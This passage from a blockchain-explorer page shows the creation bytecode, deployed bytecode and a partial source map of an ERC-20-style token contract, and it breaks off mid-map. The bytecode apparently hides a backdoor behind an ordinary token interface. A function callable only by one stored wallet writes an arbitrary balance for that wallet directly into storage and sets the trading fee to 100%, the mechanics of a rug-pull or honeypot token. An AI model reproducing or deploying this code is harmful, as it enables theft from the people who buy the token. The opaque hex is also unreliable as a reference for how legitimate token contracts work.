06000546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff19968716179055308152600b9093528183208054851660019081179091556010548216845282842080548616821790556007549091168352912080549092161790555062000864565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620004cc5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b620004e881600654620006a360201b620006f21790919060201c565b6006556001600160a01b0382166000908152600460209081526040909120546200051d918390620006f2620006a3821b17901c565b6001600160a01b0383166000818152600460205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906200056f9085815260200190565b60405180910390a35050565b6001600160a01b038316620005df5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401620004c3565b6001600160a01b038216620006425760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401620004c3565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000620006b182846200084e565b90505b92915050565b634e487b7160e01b600052601160045260246000fd5b600181815b8085111562000711578160001904821115620006f557620006f5620006ba565b808516156200070357918102915b93841c9390800290620006d5565b509250929050565b6000826200072a57506001620006b4565b816200073957506000620006b4565b81600181146200075257600281146200075d576200077d565b6001915050620006b4565b60ff841115620007715762000771620006ba565b50506001821b620006b4565b5060208310610133831016604e8410600b8410161715620007a2575081810a620006b4565b620007ae8383620006d0565b8060001904821115620007c557620007c5620006ba565b029392505050565b6000620006b160ff84168362000719565b8082028115828204841417620006b457620006b4620006ba565b6000602082840312156200080b57600080fd5b81516001600160a01b03811681146200082357600080fd5b9392505050565b6000602082840312156200083d57600080fd5b815180151581146200082357600080fd5b80820180821115620006b457620006b4620006ba565b61138880620008746000396000f3fe6080604052600436106101395760003560e01c8063751039fc116100ab578063a457c2d71161006f578063a457c2d7146103ab578063a9059cbb146103cb578063cdf4bab9146103eb578063d54f7d5e1461040a578063dd62ed3e14610428578063f2fde38b1461046e57600080fd5b8063751039fc146103035780637d1db4a5146103185780638d5f81e21461032d5780638da5cb5b1461035f57806395d89b411461037d57600080fd5b806339509351116100fd578063395093511461024357806342966c6814610263578063499a28181461028557806351c6590a146102a557806370a08231146102b8578063715018a6146102ee57600080fd5b806306fdde031461016e578063095ea7b3146101b857806318160ddd146101e857806323b872dd14610207578063313ce5671461022757600080fd5b36610169576040517f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b90600090a1005b600080fd5b34801561017a57600080fd5b5060408051808201909152600f81526e29b434b636103a3434b99031b7b4b760891b60208201525b6040516101af91906110e3565b60405180910390f35b3480156101c457600080fd5b506101d86101d336600461114d565b61048e565b60405190151581526020016101af565b3480156101f457600080fd5b506006545b6040519081526020016101af565b34801561021357600080fd5b506101d8610222366004611177565b6104a5565b34801561023357600080fd5b50604051601281526020016101af565b34801561024f57600080fd5b506101d861025e36600461114d565b61050e565b34801561026f57600080fd5b5061028361027e3660046111b3565b610544565b005b34801561029157600080fd5b506102836102a03660046111b3565b610551565b6102836102b33660046111b3565b610577565b3480156102c457600080fd5b506101f96102d33660046111cc565b6001600160a01b031660009081526004602052604090205490565b3480156102fa57600080fd5b506102836105c8565b34801561030f57600080fd5b506102836105dc565b34801561032457600080fd5b506101f96105f1565b34801561033957600080fd5b506007546001600160a01b03165b6040516001600160a01b0390911681526020016101af565b34801561036b57600080fd5b506000546001600160a01b0316610347565b34801561038957600080fd5b5060408051808201909152600581526414d212531360da1b60208201526101a2565b3480156103b757600080fd5b506101d86103c636600461114d565b61061b565b3480156103d757600080fd5b506101d86103e636600461114d565b61066a565b3480156103f757600080fd5b50600854600160a01b900460ff166101d8565b34801561041657600080fd5b506008546001600160a01b0316610347565b34801561043457600080fd5b506101f96104433660046111e7565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b34801561047a57600080fd5b506102836104893660046111cc565b610677565b600061049b338484610705565b5060015b92915050565b60006104b2848484610829565b61050484336104ff85604051806060016040528060288152602001611306602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610cdc565b610705565b5060019392505050565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161049b9185906104ff90866106f2565b61054e3382610d08565b50565b601054331461055f57600080fd5b60408051338152600460208201522055612710600c55565b61057f610e13565b6008805460ff60a01b1916600160a01b1790556105ae6105a76000546001600160a01b031690565b3083610829565b6105b88134610e6d565b506008805460ff60a01b19169055565b6105d0610e13565b6105da6000610f42565b565b6105e4610e13565b6127106002819055600155565b6000610616612710610610600254600654610f9290919063ffffffff16565b90610f9e565b905090565b600061049b33846104ff8560405180606001604052806025815260200161132e602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610cdc565b600061049b338484610829565b61067f610e13565b6001600160a01b0381166106e95760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084015b60405180910390fd5b61054e81610f42565b60006106fe8284611230565b9392505050565b6001600160a01b0383166107675760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106e0565b6001600160a01b0382166107c85760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106e0565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b610834838383610faa565b6000806108496000546001600160a01b031690565b6001600160a01b0316856001600160a01b03161415801561087857506000546001600160a01b03858116911614155b15610b50576001600160a01b0385166000908152600f602052604090205460ff161580156108bf57506001600160a01b0384166000908152600f602052604090205460ff16155b15610b50576007546001600160a01b0386811691161480156108ef57506008546001600160a01b03858116911614155b801561091457506001600160a01b0384166000908152600b602052604090205460ff16155b801561093957506001600160a01b0385166000908152600b602052604090205460ff16155b15610a5b5761095b612710610610600254600654610f9290919063ffffffff16565b8311156109bb5760405162461bcd60e51b815260206004820152602860248201527f5472616e7366657220616d6f756e74206578636565647320746865206d6178546044820152673c20b6b7bab73a1760c11b60648201526084016106e0565b6109d8612710610610600154600654610f9290919063ffffffff16565b610a01846109fb876001600160a01b031660009081526004602052604090205490565b906106f2565b1115610a5b5760405162461bcd60e51b815260206004820152602360248201527f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f6044820152621d5b9d60ea1b60648201526084016106e0565b6007546001600160a01b038581169116148015610a8157506001600160a01b0385163014155b15610ad357610aa1612710610610600d5486610f9290919063ffffffff16565b9150610abe612710610610600c5486610f9290919063ffffffff16565b32600090815260096020526040902043905590505b6007546001600160a01b038681169116148015610afe57506008546001600160a01b03858116911614155b15610b5057610b1e612710610610600d5486610f9290919063ffffffff16565b9150610b3b612710610610600e5486610f9290919063ffffffff16565b32600090815260096020526040902043905590505b6000610b5c83836106f2565b90508015610c0c578215610b7457610b748684610d08565b8115610bff576010546001600160a01b0316600090815260046020526040902054610b9f90836106f2565b601080546001600160a01b03908116600090815260046020908152604091829020949094559154915185815291811692908916917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35b610c0984826110d7565b93505b610c49846040518060600160405280602681526020016112e0602691396001600160a01b0389166000908152600460205260409020549190610cdc565b6001600160a01b038088166000908152600460205260408082209390935590871681522054610c7890856106f2565b6001600160a01b0380871660008181526004602052604090819020939093559151908816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610ccc9088815260200190565b60405180910390a3505050505050565b60008184841115610d005760405162461bcd60e51b81526004016106e091906110e3565b505050900390565b6001600160a01b038216610d685760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016106e0565b610da5816040518060600160405280602281526020016112be602291396001600160a01b0385166000908152600460205260409020549190610cdc565b6001600160a01b038316600090815260046020526040902055600654610dcb90826110d7565b6006556040518181526000906001600160a01b038416907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b6000546001600160a01b031633146105da5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016106e0565b600854610e859030906001600160a01b031684610705565b6008546001600160a01b031663f305d719823085600080610eae6000546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610f16573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610f3b9190611243565b5050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60006106fe8284611271565b60006106fe8284611288565b6001600160a01b03831661100e5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016106e0565b6001600160a01b0382166110705760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016106e0565b600081116110d25760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016106e0565b505050565b60006106fe82846112aa565b600060208083528351808285015260005b81811015611110578581018301518582016040015282016110f4565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461114857600080fd5b919050565b6000806040838503121561116057600080fd5b61116983611131565b946020939093013593505050565b60008060006060848603121561118c57600080fd5b61119584611131565b92506111a360208501611131565b9150604084013590509250925092565b6000602082840312156111c557600080fd5b5035919050565b6000602082840312156111de57600080fd5b6106fe82611131565b600080604083850312156111fa57600080fd5b61120383611131565b915061121160208401611131565b90509250929050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561049f5761049f61121a565b60008060006060848603121561125857600080fd5b8351925060208401519150604084015190509250925092565b808202811582820484141761049f5761049f61121a565b6000826112a557634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561049f5761049f61121a56fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220d508bfeea41805a72082994a67e3798190bd52dedddfc118f2f32f9a82cb990964736f6c63430008110033

Deployed Bytecode

0x6080604052600436106101395760003560e01c8063751039fc116100ab578063a457c2d71161006f578063a457c2d7146103ab578063a9059cbb146103cb578063cdf4bab9146103eb578063d54f7d5e1461040a578063dd62ed3e14610428578063f2fde38b1461046e57600080fd5b8063751039fc146103035780637d1db4a5146103185780638d5f81e21461032d5780638da5cb5b1461035f57806395d89b411461037d57600080fd5b806339509351116100fd578063395093511461024357806342966c6814610263578063499a28181461028557806351c6590a146102a557806370a08231146102b8578063715018a6146102ee57600080fd5b806306fdde031461016e578063095ea7b3146101b857806318160ddd146101e857806323b872dd14610207578063313ce5671461022757600080fd5b36610169576040517f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b90600090a1005b600080fd5b34801561017a57600080fd5b5060408051808201909152600f81526e29b434b636103a3434b99031b7b4b760891b60208201525b6040516101af91906110e3565b60405180910390f35b3480156101c457600080fd5b506101d86101d336600461114d565b61048e565b60405190151581526020016101af565b3480156101f457600080fd5b506006545b6040519081526020016101af565b34801561021357600080fd5b506101d8610222366004611177565b6104a5565b34801561023357600080fd5b50604051601281526020016101af565b34801561024f57600080fd5b506101d861025e36600461114d565b61050e565b34801561026f57600080fd5b5061028361027e3660046111b3565b610544565b005b34801561029157600080fd5b506102836102a03660046111b3565b610551565b6102836102b33660046111b3565b610577565b3480156102c457600080fd5b506101f96102d33660046111cc565b6001600160a01b031660009081526004602052604090205490565b3480156102fa57600080fd5b506102836105c8565b34801561030f57600080fd5b506102836105dc565b34801561032457600080fd5b506101f96105f1565b34801561033957600080fd5b506007546001600160a01b03165b6040516001600160a01b0390911681526020016101af565b34801561036b57600080fd5b506000546001600160a01b0316610347565b34801561038957600080fd5b5060408051808201909152600581526414d212531360da1b60208201526101a2565b3480156103b757600080fd5b506101d86103c636600461114d565b61061b565b3480156103d757600080fd5b506101d86103e636600461114d565b61066a565b3480156103f757600080fd5b50600854600160a01b900460ff166101d8565b34801561041657600080fd5b506008546001600160a01b0316610347565b34801561043457600080fd5b506101f96104433660046111e7565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b34801561047a57600080fd5b506102836104893660046111cc565b610677565b600061049b338484610705565b5060015b92915050565b60006104b2848484610829565b61050484336104ff85604051806060016040528060288152602001611306602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610cdc565b610705565b5060019392505050565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161049b9185906104ff90866106f2565b61054e3382610d08565b50565b601054331461055f57600080fd5b60408051338152600460208201522055612710600c55565b61057f610e13565b6008805460ff60a01b1916600160a01b1790556105ae6105a76000546001600160a01b031690565b3083610829565b6105b88134610e6d565b506008805460ff60a01b19169055565b6105d0610e13565b6105da6000610f42565b565b6105e4610e13565b6127106002819055600155565b6000610616612710610610600254600654610f9290919063ffffffff16565b90610f9e565b905090565b600061049b33846104ff8560405180606001604052806025815260200161132e602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610cdc565b600061049b338484610829565b61067f610e13565b6001600160a01b0381166106e95760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084015b60405180910390fd5b61054e81610f42565b60006106fe8284611230565b9392505050565b6001600160a01b0383166107675760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106e0565b6001600160a01b0382166107c85760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106e0565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b610834838383610faa565b6000806108496000546001600160a01b031690565b6001600160a01b0316856001600160a01b03161415801561087857506000546001600160a01b03858116911614155b15610b50576001600160a01b0385166000908152600f602052604090205460ff161580156108bf57506001600160a01b0384166000908152600f602052604090205460ff16155b15610b50576007546001600160a01b0386811691161480156108ef57506008546001600160a01b03858116911614155b801561091457506001600160a01b0384166000908152600b602052604090205460ff16155b801561093957506001600160a01b0385166000908152600b602052604090205460ff16155b15610a5b5761095b612710610610600254600654610f9290919063ffffffff16565b8311156109bb5760405162461bcd60e51b815260206004820152602860248201527f5472616e7366657220616d6f756e74206578636565647320746865206d6178546044820152673c20b6b7bab73a1760c11b60648201526084016106e0565b6109d8612710610610600154600654610f9290919063ffffffff16565b610a01846109fb876001600160a01b031660009081526004602052604090205490565b906106f2565b1115610a5b5760405162461bcd60e51b815260206004820152602360248201527f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f6044820152621d5b9d60ea1b60648201526084016106e0565b6007546001600160a01b038581169116148015610a8157506001600160a01b0385163014155b15610ad357610aa1612710610610600d5486610f9290919063ffffffff16565b9150610abe612710610610600c5486610f9290919063ffffffff16565b32600090815260096020526040902043905590505b6007546001600160a01b038681169116148015610afe57506008546001600160a01b03858116911614155b15610b5057610b1e612710610610600d5486610f9290919063ffffffff16565b9150610b3b612710610610600e5486610f9290919063ffffffff16565b32600090815260096020526040902043905590505b6000610b5c83836106f2565b90508015610c0c578215610b7457610b748684610d08565b8115610bff576010546001600160a01b0316600090815260046020526040902054610b9f90836106f2565b601080546001600160a01b03908116600090815260046020908152604091829020949094559154915185815291811692908916917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35b610c0984826110d7565b93505b610c49846040518060600160405280602681526020016112e0602691396001600160a01b0389166000908152600460205260409020549190610cdc565b6001600160a01b038088166000908152600460205260408082209390935590871681522054610c7890856106f2565b6001600160a01b0380871660008181526004602052604090819020939093559151908816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610ccc9088815260200190565b60405180910390a3505050505050565b60008184841115610d005760405162461bcd60e51b81526004016106e091906110e3565b505050900390565b6001600160a01b038216610d685760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016106e0565b610da5816040518060600160405280602281526020016112be602291396001600160a01b0385166000908152600460205260409020549190610cdc565b6001600160a01b038316600090815260046020526040902055600654610dcb90826110d7565b6006556040518181526000906001600160a01b038416907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b6000546001600160a01b031633146105da5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016106e0565b600854610e859030906001600160a01b031684610705565b6008546001600160a01b031663f305d719823085600080610eae6000546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610f16573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610f3b9190611243565b5050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60006106fe8284611271565b60006106fe8284611288565b6001600160a01b03831661100e5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016106e0565b6001600160a01b0382166110705760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016106e0565b600081116110d25760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016106e0565b505050565b60006106fe82846112aa565b600060208083528351808285015260005b81811015611110578581018301518582016040015282016110f4565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461114857600080fd5b919050565b6000806040838503121561116057600080fd5b61116983611131565b946020939093013593505050565b60008060006060848603121561118c57600080fd5b61119584611131565b92506111a360208501611131565b9150604084013590509250925092565b6000602082840312156111c557600080fd5b5035919050565b6000602082840312156111de57600080fd5b6106fe82611131565b600080604083850312156111fa57600080fd5b61120383611131565b915061121160208401611131565b90509250929050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561049f5761049f61121a565b60008060006060848603121561125857600080fd5b8351925060208401519150604084015190509250925092565b808202811582820484141761049f5761049f61121a565b6000826112a557634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561049f5761049f61121a56fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220d508bfeea41805a72082994a67e3798190bd52dedddfc118f2f32f9a82cb990964736f6c63430008110033

Deployed Bytecode Sourcemap

18011:9982:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27731:10;;;;;;;18011:9982;;;;;20456:73;;;;;;;;;;-1:-1:-1;20519:5:0;;;;;;;;;;;;-1:-1:-1;;;20519:5:0;;;;20456:73;;;;;;;:::i;:::-;;;;;;;;21212:152;;;;;;;;;;-1:-1:-1;21212:152:0;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;21212:152:0;1004:187:1;20694:90:0;;;;;;;;;;-1:-1:-1;20767:12:0;;20694:90;;;1342:25:1;;;1330:2;1315:18;20694:90:0;1196:177:1;21960:297:0;;;;;;;;;;-1:-1:-1;21960:297:0;;;;;:::i;:::-;;:::i;20616:73::-;;;;;;;;;;-1:-1:-1;20616:73:0;;18228:2;1853:36:1;;1841:2;1826:18;20616:73:0;1711:184:1;21369:201:0;;;;;;;;;;-1:-1:-1;21369:201:0;;;;;:::i;:::-;;:::i;25539:81::-;;;;;;;;;;-1:-1:-1;25539:81:0;;;;;:::i;:::-;;:::i;:::-;;26633:322;;;;;;;;;;-1:-1:-1;26633:322:0;;;;;:::i;:::-;;:::i;27751:239::-;;;;;;:::i;:::-;;:::i;20789:109::-;;;;;;;;;;-1:-1:-1;20789:109:0;;;;;:::i;:::-;-1:-1:-1;;;;;20875:18:0;20855:7;20875:18;;;:9;:18;;;;;;;20789:109;2637:93;;;;;;;;;;;;;:::i;22262:121::-;;;;;;;;;;;;;:::i;21832:123::-;;;;;;;;;;;;;:::i;24410:86::-;;;;;;;;;;-1:-1:-1;24477:14:0;;-1:-1:-1;;;;;24477:14:0;24410:86;;;-1:-1:-1;;;;;2440:32:1;;;2422:51;;2410:2;2395:18;24410:86:0;2276:203:1;2053:77:0;;;;;;;;;;-1:-1:-1;2099:7:0;2119:6;-1:-1:-1;;;;;2119:6:0;2053:77;;20534;;;;;;;;;;-1:-1:-1;20599:7:0;;;;;;;;;;;;-1:-1:-1;;;20599:7:0;;;;20534:77;;21575:252;;;;;;;;;;-1:-1:-1;21575:252:0;;;;;:::i;:::-;;:::i;20903:158::-;;;;;;;;;;-1:-1:-1;20903:158:0;;;;;:::i;:::-;;:::i;27616:74::-;;;;;;;;;;-1:-1:-1;27677:8:0;;-1:-1:-1;;;27677:8:0;;;;27616:74;;25435:99;;;;;;;;;;-1:-1:-1;25512:16:0;;-1:-1:-1;;;;;25512:16:0;25435:99;;21066:141;;;;;;;;;;-1:-1:-1;21066:141:0;;;;;:::i;:::-;-1:-1:-1;;;;;21175:18:0;;;21155:7;21175:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;21066:141;2867:184;;;;;;;;;;-1:-1:-1;2867:184:0;;;;;:::i;:::-;;:::i;21212:152::-;21295:4;21305:39;775:10;21328:7;21337:6;21305:8;:39::i;:::-;-1:-1:-1;21355:4:0;21212:152;;;;;:::o;21960:297::-;22066:4;22076:36;22086:6;22094:9;22105:6;22076:9;:36::i;:::-;22116:121;22125:6;775:10;22147:89;22185:6;22147:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;22147:19:0;;;;;;:11;:19;;;;;;;;775:10;22147:33;;;;;;;;;;:37;:89::i;:::-;22116:8;:121::i;:::-;-1:-1:-1;22248:4:0;21960:297;;;;;:::o;21369:201::-;775:10;21457:4;21499:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;21499:34:0;;;;;;;;;;21457:4;;21467:83;;21490:7;;21499:50;;21538:10;21499:38;:50::i;25539:81::-;25588:27;775:10;25608:6;25588:5;:27::i;:::-;25539:81;:::o;26633:322::-;26720:21;26714:28;26704:8;26701:42;26691:68;;26756:1;26753;26746:12;26691:68;26779:4;26773:11;;26799:8;26787:21;;26836:14;26829:4;26820:14;;26813:38;26866:20;26889;26934:15;26919:13;26912:38;26633:322::o;27751:239::-;1963:13;:11;:13::i;:::-;26985:8:::1;:15:::0;;-1:-1:-1;;;;26985:15:0::1;-1:-1:-1::0;;;26985:15:0::1;::::0;;27879:46:::2;27889:7;2099::::0;2119:6;-1:-1:-1;;;;;2119:6:0;;2053:77;27889:7:::2;27906:4;27913:11;27879:9;:46::i;:::-;27948:37;27962:11;27975:9;27948:13;:37::i;:::-;-1:-1:-1::0;27009:8:0::1;:16:::0;;-1:-1:-1;;;;27009:16:0::1;::::0;;27751:239::o;2637:93::-;1963:13;:11;:13::i;:::-;2695:30:::1;2722:1;2695:18;:30::i;:::-;2637:93::o:0;22262:121::-;1963:13;:11;:13::i;:::-;22334:5:::1;22309:22;:30:::0;;;22343:27:::1;:35:::0;22262:121::o;21832:123::-;21876:7;21896:54;18774:5;21896:40;21913:22;;21896:12;;:16;;:40;;;;:::i;:::-;:44;;:54::i;:::-;21889:61;;21832:123;:::o;21575:252::-;21668:4;21678:129;775:10;21701:7;21710:96;21749:15;21710:96;;;;;;;;;;;;;;;;;775:10;21710:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;21710:34:0;;;;;;;;;;;;:38;:96::i;20903:158::-;20989:4;20999:42;775:10;21023:9;21034:6;20999:9;:42::i;2867:184::-;1963:13;:11;:13::i;:::-;-1:-1:-1;;;;;2949:22:0;::::1;2941:73;;;::::0;-1:-1:-1;;;2941:73:0;;2951:2:1;2941:73:0::1;::::0;::::1;2933:21:1::0;2990:2;2970:18;;;2963:30;3029:34;3009:18;;;3002:62;-1:-1:-1;;;3080:18:1;;;3073:36;3126:19;;2941:73:0::1;;;;;;;;;3018:28;3037:8;3018:18;:28::i;10896:88::-:0;10954:7;10974:5;10978:1;10974;:5;:::i;:::-;10967:12;10896:88;-1:-1:-1;;;10896:88:0:o;24501:313::-;-1:-1:-1;;;;;24596:19:0;;24588:68;;;;-1:-1:-1;;;24588:68:0;;3620:2:1;24588:68:0;;;3602:21:1;3659:2;3639:18;;;3632:30;3698:34;3678:18;;;3671:62;-1:-1:-1;;;3749:18:1;;;3742:34;3793:19;;24588:68:0;3418:400:1;24588:68:0;-1:-1:-1;;;;;24668:21:0;;24660:68;;;;-1:-1:-1;;;24660:68:0;;4025:2:1;24660:68:0;;;4007:21:1;4064:2;4044:18;;;4037:30;4103:34;4083:18;;;4076:62;-1:-1:-1;;;4154:18:1;;;4147:32;4196:19;;24660:68:0;3823:398:1;24660:68:0;-1:-1:-1;;;;;24732:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;24777:32;;1342:25:1;;;24777:32:0;;1315:18:1;24777:32:0;;;;;;;24501:313;;;:::o;22711:1694::-;22802:42;22818:6;22826:9;22837:6;22802:15;:42::i;:::-;22848:15;22871:14;22907:7;2099;2119:6;-1:-1:-1;;;;;2119:6:0;;2053:77;22907:7;-1:-1:-1;;;;;22897:17:0;:6;-1:-1:-1;;;;;22897:17:0;;;:41;;;;-1:-1:-1;2099:7:0;2119:6;-1:-1:-1;;;;;22918:20:0;;;2119:6;;22918:20;;22897:41;22893:1002;;;-1:-1:-1;;;;;22951:27:0;;;;;;:19;:27;;;;;;;;22950:28;:63;;;;-1:-1:-1;;;;;;22983:30:0;;;;;;:19;:30;;;;;;;;22982:31;22950:63;22946:945;;;23035:14;;-1:-1:-1;;;;;23025:24:0;;;23035:14;;23025:24;:66;;;;-1:-1:-1;23074:16:0;;-1:-1:-1;;;;;23053:38:0;;;23074:16;;23053:38;;23025:66;:102;;;;-1:-1:-1;;;;;;23096:31:0;;;;;;:20;:31;;;;;;;;23095:32;23025:102;:135;;;;-1:-1:-1;;;;;;23132:28:0;;;;;;:20;:28;;;;;;;;23131:29;23025:135;23021:416;;;23184:54;18774:5;23184:40;23201:22;;23184:12;;:16;;:40;;;;:::i;:54::-;23174:6;:64;;23166:117;;;;-1:-1:-1;;;23166:117:0;;4428:2:1;23166:117:0;;;4410:21:1;4467:2;4447:18;;;4440:30;4506:34;4486:18;;;4479:62;-1:-1:-1;;;4557:18:1;;;4550:38;4605:19;;23166:117:0;4226:404:1;23166:117:0;23333:59;18774:5;23333:45;23350:27;;23333:12;;:16;;:45;;;;:::i;:59::-;23297:32;23322:6;23297:20;23307:9;-1:-1:-1;;;;;20875:18:0;20855:7;20875:18;;;:9;:18;;;;;;;20789:109;23297:20;:24;;:32::i;:::-;:95;;23289:143;;;;-1:-1:-1;;;23289:143:0;;4837:2:1;23289:143:0;;;4819:21:1;4876:2;4856:18;;;4849:30;4915:34;4895:18;;;4888:62;-1:-1:-1;;;4966:18:1;;;4959:33;5009:19;;23289:143:0;4635:399:1;23289:143:0;23472:14;;-1:-1:-1;;;;;23459:27:0;;;23472:14;;23459:27;:54;;;;-1:-1:-1;;;;;;23490:23:0;;23508:4;23490:23;;23459:54;23455:202;;;23529:34;18774:5;23529:20;23540:8;;23529:6;:10;;:20;;;;:::i;:34::-;23519:44;;23576:34;18774:5;23576:20;23587:8;;23576:6;:10;;:20;;;;:::i;:34::-;23627:9;23614:23;;;;:12;:23;;;;;23640:12;23614:38;;23567:43;-1:-1:-1;23455:202:0;23688:14;;-1:-1:-1;;;;;23678:24:0;;;23688:14;;23678:24;:66;;;;-1:-1:-1;23727:16:0;;-1:-1:-1;;;;;23706:38:0;;;23727:16;;23706:38;;23678:66;23674:213;;;23760:34;18774:5;23760:20;23771:8;;23760:6;:10;;:20;;;;:::i;:34::-;23750:44;;23807:33;18774:5;23807:19;23818:7;;23807:6;:10;;:19;;;;:::i;:33::-;23857:9;23844:23;;;;:12;:23;;;;;23870:12;23844:38;;23798:42;-1:-1:-1;23674:213:0;23898:16;23917:19;:7;23929:6;23917:11;:19::i;:::-;23898:38;-1:-1:-1;23944:12:0;;23940:259;;23966:11;;23962:48;;23983:22;23989:6;23997:7;23983:5;:22::i;:::-;24019:10;;24015:145;;24075:16;;-1:-1:-1;;;;;24075:16:0;24065:27;;;;: